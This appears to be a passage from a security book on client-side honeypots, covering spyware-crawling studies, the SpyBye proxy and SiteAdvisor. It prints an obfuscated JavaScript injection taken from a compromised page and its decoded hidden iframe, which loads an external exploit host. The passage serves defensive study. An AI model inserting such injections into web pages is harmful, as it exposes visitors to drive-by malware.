In this section, we take a look at some other approaches to build a client-side honeypot. We give an overview of different projects in this area and present some of the lessons learned with the help of them. Some of these projects have an academic background, and some are commercial products.
We start with a brief overview of Pezzonavante, a high-interaction client honeypot by Danford. This tool uses a hybrid, asynchronous approach to detect whether the client honeypot has been compromised: it scans the system with security tools for malware, correlates Snort network IDS alerts, compares system snapshots, and also closely analyzes the network traffic (a sketch of the snapshot-comparison idea follows the list below). The project itself is unfortunately not publicly available, but Danford presents his deployment experience in a presentation [18]:
In a period between October 2005 and March 2006, 200,000 URLs were surfed.
More than 750 spyware-related events could be observed.
About 1500 malware samples could be collected.
More than 500 malicious URLs could be detected and takedown requests were submitted.
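Since Pezzonavante itself is not available, the following is only a minimal sketch of the snapshot-comparison idea it relies on: record cryptographic hashes of all files on a clean system and diff them against a later snapshot. The root directory and the choice of SHA-256 are illustrative assumptions, not details of the actual tool.

import hashlib
import os

def snapshot(root):
    # Walk the filesystem and record a hash for every readable file.
    state = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    state[path] = hashlib.sha256(fh.read()).hexdigest()
            except OSError:
                continue
    return state

def changed_files(before, after):
    # Files that are new or whose contents changed since the clean snapshot.
    return [path for path, digest in after.items() if before.get(path) != digest]

Calling snapshot() before and after visiting a URL and comparing the two results reveals which files were created or modified during the visit.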
In the following, we present some other projects in the area of client honeypots and their results.
We start with a closer look at a low-interaction client-side honeypot. In a paper entitled "A Crawler-Based Study of Spyware on the Web," several researchers from the Department of Computer Science and Engineering at the University of Washington present their project results [57]. They tried to answer the following questions:
How much spyware is on the Internet?
Where is that spyware located (e.g., game sites, children's sites, adult sites, etc.)?
How likely is a user to encounter spyware through random browsing?
What fraction of executables on the Internet are infected with spyware?
What fraction of web pages infect victims through scripted, drive-by download attacks?
How is the spyware threat changing over time?
Their approach is very similar to the one we presented earlier. The basic idea is to use the web crawler Heritrix to investigate a large portion of the World Wide Web. Executable files are then downloaded and installed within a virtual machine. In an analysis phase, it is determined whether the executable caused a spyware infection.
We introduced Heritrix in the beginning of this chapter, and you can find more information about it at http://crawler.archive.org/. To start a web crawl, Heritrix uses a so-called seed, a collection of URLs from which Heritrix starts its search and begins the actual crawling. In this study, the seed is generated with two different approaches: the Google directory, a collection of links sorted by different categories, and keyword searches on Google itself. To differentiate between different kinds of users, they base both approaches on eight different categories: adult entertainment sites, celebrity-oriented sites, games-oriented sites, kids' sites, music sites, online news, pirate/warez sites, and screensaver or wallpaper sites. This results in several seeds that are then fed to Heritrix. The web crawler examines the sites to a depth of three links, restricting the search to pages hosted on the same domain. This gives thorough coverage of individual sites and breadth across many sites; on average, 6577 pages were crawled per site. Since many websites host downloadable executables on a separate web server, the crawler was also allowed to download executables linked from the seed site but hosted on a different server.
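To make the crawling policy more concrete, here is a minimal sketch of a depth-limited, same-domain crawler. It is not Heritrix; the regular-expression link extraction, the timeout, and the depth limit are simplifying assumptions, and the cross-domain fetching of executables that the study still allowed is not handled here.

import re
import urllib.request
from collections import deque
from urllib.parse import urljoin, urlparse

HREF_RE = re.compile(r'href=["\'](.*?)["\']', re.IGNORECASE)

def crawl(seed, max_depth=3):
    # Breadth-first crawl, restricted to the seed's domain, up to max_depth links deep.
    domain = urlparse(seed).netloc
    seen, queue, pages = {seed}, deque([(seed, 0)]), []
    while queue:
        url, depth = queue.popleft()
        try:
            html = urllib.request.urlopen(url, timeout=10).read().decode("utf-8", "replace")
        except Exception:
            continue
        pages.append(url)
        if depth >= max_depth:
            continue
        for link in HREF_RE.findall(html):
            absolute = urljoin(url, link)
            # Stay on the seed's domain for HTML pages, as the study did.
            if urlparse(absolute).netloc == domain and absolute not in seen:
                seen.add(absolute)
                queue.append((absolute, depth + 1))
    return pages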
Two different heuristics are used to detect whether a given file is executable. Since the study focuses on spyware, certain kinds of attacks may be missed; for example, the IFRAME vulnerability discussed in Section 8.1.1 and the associated infections cannot easily be detected with this approach. On the other hand, these heuristics should not lead to false positives; in other words, every downloaded file should indeed be an executable. To improve the detection rate, the researchers also downloaded archives like ZIP files and examined whether these contained executables. Moreover, JavaScript within HTML files was examined for additional URLs. As you can see, there are many design choices when setting up such a study.
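The paper's exact heuristics are not reproduced here. As an illustration of the kind of check involved, the following sketch combines a file name extension test with the "MZ" magic bytes of Windows executables and also looks inside ZIP archives; the extension list is an assumption and may differ from what the study actually used.

import io
import zipfile

EXECUTABLE_EXTENSIONS = (".exe", ".msi", ".cab")   # assumed extension list

def looks_like_executable(filename, data):
    if filename.lower().endswith(EXECUTABLE_EXTENSIONS):
        return True
    # Windows PE/DOS executables start with the two magic bytes "MZ".
    return data[:2] == b"MZ"

def archive_contains_executable(data):
    # The study also inspected archives such as ZIP files for executables inside.
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            return any(name.lower().endswith(EXECUTABLE_EXTENSIONS)
                       for name in archive.namelist())
    except zipfile.BadZipFile:
        return False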
To analyze the downloaded executable, they install it within a virtual machine. This virtual machine is used as a quick way to revert from an infected to a clean state. If the executable is malicious, it will change certain parts of the operating system and, for example, automatically start itself upon reboot. Hence, it is necessary to quickly revert all changes caused by the execution of the file. The easiest way to do this is to use a virtual machine — for example, VMware, which we introduced in Chapter 2. With the snapshot and revert function of VMware, it takes only a couple of seconds to undo all changes and have a clean system again.
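With VMware, the revert step can be scripted. The following sketch uses VMware's vmrun command-line utility; the .vmx path and the snapshot name "clean" are hypothetical.

import subprocess

def revert_to_clean(vmx_path="/vms/analysis/winxp.vmx", snapshot_name="clean"):
    # Roll the guest back to the pristine snapshot and start it again.
    subprocess.run(["vmrun", "-T", "ws", "revertToSnapshot", vmx_path, snapshot_name],
                   check=True)
    subprocess.run(["vmrun", "-T", "ws", "start", vmx_path], check=True)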
In addition, they put a lot of effort into the installation phase of the downloaded executables. Most of the time, the installation process requires some user interaction: for example, the user has to accept the license agreement, select the installation path, or click the Finish button to end the installation. They therefore developed a framework to automate these tasks. The resulting tool can click common permission-granting buttons such as Next, OK, or I Agree; identify and select common radio buttons or check boxes; and fill out type-in boxes that prompt the user for personal information. As a result, the installation process of most common installation frameworks can be automated.
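The researchers' framework is not publicly available; the following is a rough sketch of the same click-through idea using the pywinauto library. The window title pattern and the button captions are assumptions, and a real harness would loop over successive installer pages and handle check boxes and text fields as well.

from pywinauto import Application

# Button captions commonly used by installers; the list is an assumption.
PERMISSION_BUTTONS = ["I Agree", "Yes", "Next >", "Next", "Install", "Finish", "OK"]

def click_through_installer(title_re=".*(Setup|Install).*"):
    # Attach to a running installer window and try the usual permission-granting buttons.
    app = Application(backend="uia").connect(title_re=title_re, timeout=30)
    dialog = app.top_window()
    for caption in PERMISSION_BUTTONS:
        try:
            dialog.child_window(title=caption, control_type="Button").click_input()
        except Exception:
            # This installer page does not show the button; try the next caption.
            continue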
Once the executable is installed, the last step of the study is to determine whether the executable is actually some type of spyware. To answer this question, they use the antispyware tool AdAware by Lavasoft (http://www.lavasoftusa.com/). This tool is installed within the virtual machine, and once the installation of the downloaded file is finished, AdAware is started automatically. AdAware searches the filesystem, registry, and other parts of the operating system for suspicious entries and tries to identify which kind of malware is installed on the system. It reports its findings, and this report is analyzed automatically in the study. With additional manual effort, the type of infection (e.g., keylogger, adware, Trojan backdoor, or browser hijacker) is determined. The main drawback of this approach is that it identifies only spyware for which AdAware has signatures. This means that not all spyware files will be identified as such, and it is hard to determine the false negative rate. As a result, the findings of the study are a lower bound on the amount of spyware that can actually be found on the World Wide Web.
To learn more about the changing threat of client-side attacks, the whole measurement was conducted twice: the first run was carried out in May 2005 and the second five months later in October 2005. This makes it possible to compare the two runs and observe how the threat developed over time.
For the first study in May 2005, the researchers crawled 18 million URLs and found spyware in 13.4 percent of the 21,200 executables they identified. At the same time, they found scripted drive-by download attacks in 5.9 percent of the processed web pages. The results dropped for the second study in October 2005. At that point, they crawled almost 22 million URLs but found "only" 1294 infected executables, which is about 5.5 percent of the 23,694 executables identified. This rather large drop is mainly caused by a single site whose number of infected executables declined from 1776 in May to 503 in October.
In both crawls, they found executable files on approximately 19 percent of all crawled websites and spyware-infected executables on about 4 percent of the sites. Overall, they found that as of October 2005, approximately 1 in 20 of the executable files crawled contained spyware, an indication of the extent of the spyware problem. The only positive result of the study is that the number of unique spyware programs is rather low: they identified only 82 and 89 unique versions in the two crawls, respectively.
Another result is that spyware appears on a small but nonnegligible fraction of the websites that were crawled. In the first crawl, 3.8 percent of the domains were found to be infected, and this number was slightly higher, at 4.4 percent, in October 2005. The distribution of spyware across domains follows the usual pattern: while some sites offer a large number of infected executables, most offer just a handful.
Based on the different categories used to search for malicious content, the study can also identify suspicious parts of the Internet. The results show that the highest-risk category is websites related to games. Approximately 60 percent of all sites in this category contain executable content, which presumably consists of free games or game demos available for download. Although only a small fraction of these executables contain spyware (5.6 percent), one in five game sites includes spyware programs. Another high-risk category is celebrity-oriented sites, for which more than one in seven executables is infected with spyware.
More detailed information and many additional statistics about this study can be found in the paper by Moshchuk et al. [57].
Many web pages that attempt to compromise unsuspecting visitors and install malware do so without the knowledge of the web master responsible for the pages. The proliferation of easy-to-install web applications, such as phpBB2, has resulted in a large number of web servers that are vulnerable to remote exploitation. Although it is easy to install these web applications, it is not as easy to fix their security vulnerabilities, and there are many of them. To gain control of as many machines as possible, adversaries have taken a new approach: they scan the Internet for such vulnerable web applications and compromise them to install JavaScript or iframes that in turn compromise any visitor to these sites. Here is a common example of how a web page might look after it has been compromised:
<script language="JavaScript">
e = '0x00' + '5F';
str1 = "%E4%BC%B7%AA%C0%AD%AC%A7%B4%BB%E3%FE%AA%B7%AD%B7%BE%B7%B4%B7%AC%A7%E6%B8%B7" +
       "%BC%BC%BB%B2%FE%E2%E4%B7%BA%AE%BF%B3%BB%C0%AD%AE%BD%E3%FE%B8%AC%AC%B0%E6%F1" +
       "%F1%B0%AE%BF%BC%B1%E9%F2%BD%B1%B3%F1%AC%AE%BA%F1%FE%C0%A9%B7%BC%AC%B8%E3%EF" +
       "%C0%B8%BB%B7%B9%B8%AC%E3%EF%E2%E4%F1%B7%BA%AE%BF%B3%BB%E2%E4%F1%BC%B7%AA%E2";
str = tmp = '';
for (i = 0; i < str1.length; i += 3) {
    tmp = unescape(str1.slice(i, i + 3));
    str = str + String.fromCharCode((tmp.charCodeAt(0) ^ e) - 127);
}
document.write(str);
</script>
Although this snippet of JavaScript might not make much sense to us, our web browser will evaluate it, strip the obfuscation, and end up with this content instead:
<div style="visibility:hidden"> <iframe src="http://prado7.com/trf/" width=1 height=1></iframe></div>
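To see what the browser ends up with without actually rendering the page, the decoding loop can be reproduced offline. The following sketch mirrors the logic of the JavaScript above: each %XX escape is turned into a byte, XORed with the key the script builds ('0x00' + '5F', that is, 95), and shifted by 127.

# Offline deobfuscation of the script's encoded payload.
encoded = ("%E4%BC%B7%AA%C0%AD%AC%A7%B4%BB%E3%FE%AA%B7%AD%B7%BE%B7%B4%B7%AC%A7%E6%B8%B7"
           "%BC%BC%BB%B2%FE%E2%E4%B7%BA%AE%BF%B3%BB%C0%AD%AE%BD%E3%FE%B8%AC%AC%B0%E6%F1"
           "%F1%B0%AE%BF%BC%B1%E9%F2%BD%B1%B3%F1%AC%AE%BA%F1%FE%C0%A9%B7%BC%AC%B8%E3%EF"
           "%C0%B8%BB%B7%B9%B8%AC%E3%EF%E2%E4%F1%B7%BA%AE%BF%B3%BB%E2%E4%F1%BC%B7%AA%E2")

key = int("0x005F", 16)   # the script assembles this key as '0x00' + '5F'
decoded = ""
for i in range(0, len(encoded), 3):
    byte = int(encoded[i + 1:i + 3], 16)      # the value behind each %XX escape
    decoded += chr((byte ^ key) - 127)        # same XOR and offset as the JavaScript
print(decoded)                                 # prints the hidden div/iframe shown above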
The iframe is responsible for fetching code that tries to exploit the web browser visiting the compromised website. If the exploit is successful, malware and other nasty software is downloaded onto the user's computer. Unfortunately, finding this kind of code on your own website can be difficult. To help with this problem, one of the authors created SpyBye, a tool that lets web masters determine whether their web pages have been compromised to install malware.
SpyBye itself does not do very much; it relies mostly on your own browser to do the interesting work. SpyBye operates as a proxy server and gets to see all the web fetches your browser makes as a result of visiting a web page. It applies very simple rules to each URL that is fetched and classifies it into one of three categories: harmless, unknown, or dangerous. Although there is a large margin of error, the categories allow a web master to look at the URLs and decide whether they should be there. If you see a URL being fetched that you would not expect, it is a good indication that you have been compromised. In addition to applying heuristics for determining whether a site is potentially malicious, SpyBye also scans all fetched content for malware and spyware using the open source virus scanner ClamAV.
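The classification step can be pictured as simple pattern matching against lists of known-good and known-bad URL patterns. The following is only a simplified sketch of that idea, not SpyBye's actual code; the example pattern entries are made up (SpyBye fetches its real lists from the good_patterns and bad_patterns files visible in the startup output below).

import re

GOOD_PATTERNS = [r"google-analytics\.com/", r"\.gstatic\.com/"]   # assumed examples
BAD_PATTERNS = [r"prado7\.com", r"/trf/"]                          # assumed examples

def classify(url, origin_host):
    # Known-bad patterns win; URLs from the page's own host or matching a
    # good pattern are harmless; everything else stays unknown.
    if any(re.search(pattern, url) for pattern in BAD_PATTERNS):
        return "dangerous"
    if origin_host in url or any(re.search(pattern, url) for pattern in GOOD_PATTERNS):
        return "harmless"
    return "unknown"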
You must follow these steps to install your own SpyBye proxy:
1. Download and unpack the latest libevent source code.
2. Download and unpack the SpyBye source code from the SpyBye website (http://www.spybye.org/).
3. Configure, compile, and install libevent by executing the following commands in the libevent directory: ./configure && make && sudo make install.
4. Configure, compile, and install SpyBye by executing the same commands in the SpyBye directory: ./configure && make && sudo make install.
If these instructions seem too complicated, you can just use the SpyBye proxy running at www.spybye.org:8080.
You need to figure out on which host and which port you want to run SpyBye. If you don't plan on running it permanently, you probably want to install it locally. Run the following command: spybye -p 8080. At this point, you should see output like the following:
SpyBye 0.2 starting up ...
Loaded 90345 signatures
Virus scanning enabled
Report sharing enabled.
Making connection to www.monkey.org:80 for /~provos/good_patterns
Received 529 bytes from http://www.monkey.org/~provos/good_patterns
Added 30 good patterns
Making connection to www.monkey.org:80 for /~provos/bad_patterns
Received 3240 bytes from http://www.monkey.org/~provos/bad_patterns
Added 200 bad patterns
Starting web server on port 8080
Configure your browser to use this server as proxy
Now, configure your web browser to use 127.0.0.1:8080 as an HTTP proxy server. This instructs your web browser to send all its requests to SpyBye; from this point on, you no longer browse the web directly, since all requests are routed via the SpyBye proxy.
To start, go to http://spybye/. If everything worked, you should see a little status header and a form field in which you can enter a URL. Try to enter the URL for a site you want to check.
SpyBye classifies URLs into three different categories to assist with the analysis of a web page.
Harmless: A URL that originates from your website or is matched by a pattern in the good patterns file.
Unknown: A URL that did not originate with your website. This is likely to be third-party provided content and could be dangerous. If you see an unknown URL that you do not recognize, something might be wrong with your website.
Dangerous: A URL with a high likelihood of being dangerous. This is usually an indication that your website has been compromised. You should check if all your web applications have the latest security patches installed, and you might also have to reinstall your web server. Attackers usually leave backdoors that give them remote access to your site, even after you have removed potential exploits from your web pages.
You might be wondering why you should visit a potentially dangerous web page with your browser at all, since doing so could harm your computer. SpyBye attempts to limit the damage a malicious site can cause by not forwarding any content that has been deemed dangerous. Unfortunately, no system is perfect. We recommend that you run the browser that is talking to SpyBye in its own virtual machine; that way, you can simply revert to a clean snapshot when you are done with the evaluation.
A commercial approach in this area is McAfee SiteAdvisor (http://www.siteadvisor.com/). SiteAdvisor is also a low-interaction variant of the client-side honeypot approach. Again, the idea is to download large parts of the Internet and then check whether they are malicious. For example, the project checks for exploits contained in a website or for downloads that are spyware, adware, or other kinds of malware. Moreover, it checks whether the site contains links to other malicious websites or pop-ups. An interesting feature is the check for e-mail abuse: if a form is found that lets you register with the site, this form is filled out automatically with a site-specific e-mail address, and all spam arriving at that address is closely monitored. You can think of this mechanism as a kind of honeytoken that checks whether the e-mail address is abused.
You can use the results published by SiteAdvisor to enhance your own browsing experience. Visit the website http://www.siteadvisor.com/, click on the "Download" link, and then download the autodetected plug-in for your web browser. The system requirements for this tool are as follows:
Operating System: Windows 98/ME/2000/XP, Linux, and Mac OS X
Minimum Hardware: 400 MHz processor, 128 MB RAM, 5 MB free disk space, and an Internet connection
At this point, only Mozilla Firefox and Internet Explorer are supported, so if you use another web browser, you cannot use this service. To install the appropriate plug-in, simply click on the downloaded file and follow the on-screen instructions. Once you have restarted your browser, you can instantly benefit from the results SiteAdvisor has collected. You now have a new toolbar in your browser that gives you information about the status of the current website. For example, it will mark suspicious pages returned via search engine queries with a red cross to indicate that you should not visit such a website. Currently, it supports Google, Yahoo!, and MSN. As another example: When you browse the World Wide Web, a small button on your browser toolbar changes color based on SiteAdvisor's safety results. Once this toolbar turns red, you should be very suspicious, since the current website is rated as malicious by SiteAdvisor.
With these features you can browse the Web in a safer way, and your chances of getting infected via malicious websites and drive-by downloads are reduced. A very interesting feature of SiteAdvisor is its ability to track relationships between different websites. Imagine that site A is rated suspicious and site B includes a link to A. Since there is a relation between these sites, the rating of site B will be slightly lowered. Based on these data, it is possible to identify dangerous parts of the Internet that should not be visited without protection, especially not with an unpatched system.
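As a toy illustration of this link-based adjustment, consider the following sketch; the rating scale, the threshold, and the penalty factor are assumptions and not SiteAdvisor's actual formula.

def adjusted_rating(own_rating, linked_ratings, penalty=0.1):
    # Lower a site's rating (scale 0.0 to 1.0) a bit for each suspicious site it links to.
    bad_links = sum(1 for rating in linked_ratings if rating < 0.5)
    return max(0.0, own_rating - penalty * bad_links)

For example, a site rated 0.9 that links to two suspicious sites would drop to 0.7 under this toy scheme.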
Some interesting results are also published by SiteAdvisor that deal with the (in)security of search engines. In a study from May 2006, they used more than 1300 popular keywords from different areas and tested the five most prevalent search engines. They examined the first five pages of results for each keyword with the SiteAdvisor methodology just described and calculated the safety rating accordingly. To quote their results: "Overall, MSN search results had the lowest percentage (3.9 percent) of dangerous sites while Ask search results had the highest percentage (6.1 percent). Google was in between (5.3 percent)."[1]
[1] http://www.siteadvisor.com/studies/search_safety_may2006.html.
Besides the preceding honeypot solutions, there are also some possibilities for further research in this area. For example, passive client-side honeypots are an area where not much research and development have been done yet. The following research can, for example, be considered:
IRC-based honeyclients that join a specific IRC server and channel (e.g., #warez, #1337) and then simply idle in the channel or throw in random quotes. This can help determine whether an IRC user is subject to more attacks (a minimal sketch of such a client follows this list).
Instant messenger-based honeyclients (e.g., AIM, ICQ, MSN ...) that connect to the network and interpret received messages. This can be used to learn more about bots that spread via instant messaging networks and about malicious users that distribute malicious links.
Mail-based honeyclients that download e-mails and check whether they are malicious. In addition, such a client-side honeypot can analyze the content of each e-mail and follow embedded links (thus being very similar to web-based honeyclients). Presumably, this kind of e-mail contains significantly more malicious content.
Peer-to-peer (P2P) based honeyclients that randomly download files from P2P networks and execute them. Since we know that malware uses this propagation mechanism, it is worth exploring. Several academic studies showed that malware in P2P systems is common [45,79].
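Here is the minimal sketch of the IRC-based honeyclient idea mentioned in the first item of the list above: connect, register, join a channel, keep the connection alive, and log everything received. The server, channel, and nickname are illustrative assumptions, and a complete client would wait for the server's welcome reply before joining the channel.

import socket

def irc_honeyclient(server="irc.example.net", port=6667, channel="#warez", nick="idleuser42"):
    sock = socket.create_connection((server, port))
    # Register with the server and join the channel to be monitored.
    sock.sendall(f"NICK {nick}\r\nUSER {nick} 0 * :{nick}\r\nJOIN {channel}\r\n".encode())
    with open("irc-honeyclient.log", "a") as log:
        while True:
            data = sock.recv(4096)
            if not data:
                break
            for line in data.decode("utf-8", "replace").splitlines():
                if line.startswith("PING"):
                    # Answer keepalives so the client keeps idling in the channel.
                    sock.sendall(("PONG" + line[4:] + "\r\n").encode())
                else:
                    log.write(line + "\n")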
Again, these types of honeypots must regularly check their own consistency and detect changes. This way, they can notice if they were exploited by malicious servers or other attackers.
There are many possible antihoneyclient techniques. For example, an adversary could blacklist known honeypot operators, use anticrawling techniques, or trigger the actual exploit only after a timeout of a couple of minutes. Danford gives an excellent overview of the research challenges in this area [18].